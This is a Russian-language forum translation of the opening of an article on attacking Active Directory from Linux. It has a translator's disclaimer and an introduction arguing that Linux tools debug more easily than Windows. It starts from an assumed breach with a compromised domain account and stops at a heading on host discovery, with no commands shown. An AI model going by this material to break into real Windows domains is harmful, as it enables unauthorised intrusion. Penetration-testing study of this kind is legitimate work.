Первоисточник: https://gatari.dev/posts/the-art-of-exploiting-ad-from-linux/#what-if-i-have-no-credentials
Перевел: wesskibo специально для .is
ДИСКЛЕЙМЕР
Я не программист, а так же не разбираюсь в тех.части, потому перевод местами может быть не корректным. Не засоряйте тему исправлениями, отпишите в ПМ форума где есть ошибки, всем заранее спасибо!
Статья разделена на 2 части, так как я достиг ограничения по картинкам на форуме!
Вторая часть доступна по ссылке: threads/125578/
Введение
За время работы в лабораториях по Active Directory и помощи друзьям с их лабами я понял одно: дебагать Windows — это просто жесть.
Почти нереально нагуглить ошибки, так как они либо слишком общие, либо уникальные для конкретной атаки, над которой работаешь, и зачастую сообщения об ошибках сбивают с толку. Плюс, команды, которые работают у меня, могут не работать у других. И надо учитывать много других моментов, таких как:
В этом посте я расскажу о причинах, почему атака на Active Directory с Linux, на мой взгляд, предпочтительнее, чем с Windows, а также приведу примеры, как это сделать.
Но почему?
Я заметил, что в большинстве случаев, когда у моих друзей возникали проблемы, я советовал перенести их тикеты на Linux и воспользоваться тамошними инструментами с флагом --debug. Ошибки, выдаваемые в этом окружении, обычно более информативны. Их легче гуглить, а так же на них не влияет нестабильность Windows.
Я считаю, что большую часть атак на Active Directory можно выполнить с Linux так же, как и с Windows, но с дополнительным преимуществом в виде упрощенной отладки.
Дисклеймер
Я не утверждаю, что атака с Linux — это лучший выбор для всех ситуаций. В конечном итоге, выбор инструментов остается за оператором, исходя из конкретной задачи.
Предпологаемое вторжение
Во многих случаях у вас уже может быть доступ к сети. Чаще всего это одна скомпрометированная учетная запись доменного пользователя и/или рабочая станция.
Первые шаги, которые вы можете предпринять:
Идентификация и разрешение хостов